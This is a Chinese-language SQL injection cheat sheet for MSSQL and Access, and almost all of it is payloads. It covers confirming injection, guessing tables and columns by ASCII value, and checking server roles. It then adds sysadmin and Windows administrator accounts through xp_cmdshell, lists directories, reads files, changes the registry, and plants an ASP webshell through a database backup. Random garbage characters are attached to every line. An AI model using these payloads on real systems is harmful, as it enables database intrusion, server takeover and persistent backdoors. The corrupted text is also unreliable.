1.判断是否有注入;and 1=1 ;and 1=2 ]�)}a�^]0q
2.初步判断是否是mssql ;and user>0 sSd/\A���p
%UA�F~�2]g
3.注入参数是字符'and [查询条件] and ''=' m �_cR�K}>
28k=@k^��q
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��F~q(@.�b
�F+"_]���
5.判断数据库系统 #x;,RPw�5
� />Q}0H�g
;and (select count(*) from sysobjects)>0 mssql aaP�_^m O�
NV7k@7_{B�
;and (select count(*) from msysobjects)>0 access !_v�xbfZ�O
s1q8�r!2\w
+D�@5�zq:5
r�tS' 90�`
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �l+[:�Cni
R&9FdM3K`:
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 '�IG@J��L'
A�HRJ7l;�a
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ak7kb7��5o
XeX"IhgS>E
9.(1)猜字段的ascii值(access) ���jUE�gu
��k�i?��h7
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 !��!A�0K"h
��#F`A�(�n
(2)猜字段的ascii值(mssql) t%;w<1���E
�W%4=x>�J-
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 #~!"`B?#�*
`�J1HQ!�Z�
10.测试权限结构(mssql) E7t;p�)x��
7i*eKC`ZqK
;�h\T7pwwb
;xZjt4�M1
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Hc�gvlF��b
��TjyL])�$
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 8����q@��Z
�
pZ�&�,YX
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- <��%HRs>4
��4b:�|>Z-
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �PVsKI�<��
#,%7tX�OLR
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- R|C�2O[r}�
U��}LW8886
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- =eDIvN�ps
�* :�O"R
;and 1=(select IS_MEMBER('db_owner'));-- `&M,B=���E
��{uj_4Ft
v��d{Q�FJ
��9<6q(]U�
11.添加mssql和系统的帐户 o�vd�J[b�O
hb�J>GSoZ,
;exec master.dbo.sp_addlogin username;-- z�5�kA�f~A
;exec master.dbo.sp_password null,username,password;-- $�iu[-m�y_
.!x&d4;,�q
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- f�b�NzRX�w
!�R�=@�Nr>
;exec master.dbo.xp_cmdshell 'net user username password ��gv''�A"�
unLh��I0XW
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- T�IWR[r1!�
(k?H��T'3)
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �G3~`]qf
[ QiG0D_'=
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �H"#��ITL�
f#\YX
tR,k
w��T4@X[5$
$-�iE�cxsi
12.(1)遍历目录 }d<R
����5
7u��F�|�Z(
;create table dirs(paths varchar(100), id int) 7;s#�QqG`I
5o#J��H��D
;insert dirs exec master.dbo.xp_dirtree 'c:\' 7l D�-|�yx
Nc;O)K!FH
;and (select top 1 paths from dirs)>0 8R�,<S-+v�
p49]{2GXb�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �=V�[�uXm�
~SnUnNDm�`
j�*jU�cD�*
Z!)~?<gcq:
(2)遍历目录 i�lA45���@
0NXH449I=�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- m�Qj=-\��p
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �l4OrlS/�5
�>�]�\I:T�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �c.o�w4~>
i[�o 2(d�,
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �s��6!6Oqh
����!+eH8
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 n0���xGI�q
Oynb�"�T&8
`*�C=R
�
_
+����$��h�
13.mssql中的存储过程 �gc9�R;B�1
fw%`[(�h�K
xp_regenumvalues 注册表根键, 子键 ��&mwd�0%4
E/P~�HE{��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 O>~,R���I!
<+�`%�=r)4
xp_regread 根键,子键,键值名 .%z�c��m��
=V^-@�ji)b
;exec xp_regread l8\UO<^�fY
\|]mClj#��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 C=:�<[_m`
VdLoi\�-/L
xp_regwrite 根键,子键, 值名, 值类型, 值 H@Dp�ht>[�
"Ms;sdjg}&
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 0�j.K?]f)h
E}�@C4�pS�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �"
�kDiK`i
�J2Y�QdCL�
xp_regdeletevalue 根键,子键,值名 ��z3o�i(��
�3k C�i5C
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �0MG��>�77
j~��C�nMKN
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 (�|g�Q
i{8
)@�Pn�pC%H
L,� JQ\!�c
=!q%
1�mP�
14.mssql的backup创建webshell |>.Q �U3
Cp�8=8N(Xb
use model p��0+^wXi)
R�B��5SK#z
create table cmd(str image); v p�I��9TG
Dw��-d`8*
insert into cmd(str) values (''); vg�z`+Zj*S
"��y1I�u �
backup database model to disk='c:\l.asp'; YR%iZ"`*+O
+r:g�}i�R
i�Ux\�3d,�
)�t6]F6�!_
15.mssql内置函数 �~zVxprEf_
hA�GHb�+:
;and (select @@version)>0 获得Windows的版本号 �YH&=c�I@�
z/@_?01T�=
;and user_name()='dbo' 判断当前系统的连接用户是不是sa }A#IBqf5�
u�q�Mw-�f/
;and (select user_name())>0 爆当前系统的连接用户 $�[�gN#QW%
Y'�v[2���s
;and (select db_name())>0 得到当前连接的数据库 ]�l�B zp�D
�5x�Q���-f
>=�~��\�b�
$ghZ<Y2}�9
16.简洁的webshell }3p���M,.�
@<.@�X*�#I
use model Gw
M:f/eV�
�(3#PKfY+
create table cmd(str image); 5KCB^`|b>t
nxLuzf4�U5
insert into cmd(str) values (''); QV��;�o9j�
�D� /e��H~
backup database model to disk='g:\wwwtest\l.asp';
